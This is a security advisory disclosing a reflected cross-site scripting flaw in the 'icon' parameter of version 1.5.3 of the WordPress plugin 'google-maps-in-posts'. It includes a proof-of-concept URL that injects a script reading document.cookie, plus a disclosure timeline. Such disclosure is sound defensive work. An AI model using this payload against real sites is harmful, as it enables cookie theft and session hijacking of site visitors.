Plugin Details
Plugin Name: wp-plugin : google-maps-in-posts
Effected Version : 1.5.3 (and most probably lower version's if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : anantshri
Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :
http://localhost/wp-content/plugins/google-maps-in-posts/icons/icon.php?icon=icon"><script>alert(document.cookie)</script>&
Vulnerable Parameter : icon
Type of XSS : Reflected
Disclosure Timeline
Vendor Contacted : 2014-01-05
Plugin Status : Updated on
Public Disclosure : July 7, 2014
CVE Number :
Plugin Description :
[|
Google Maps in Posts plugin for WordPress gives possibility to use Google Maps Services in your blog.
That could be useful for posts in WP, describing certain locations or events,
to indicate them immediately in the WP post with a map. The Google Maps Plugin
gives you a simple and easy Worpress administration back end to handle multiple
locations and your own location would be defined only once for all the maps of your WP blog.
]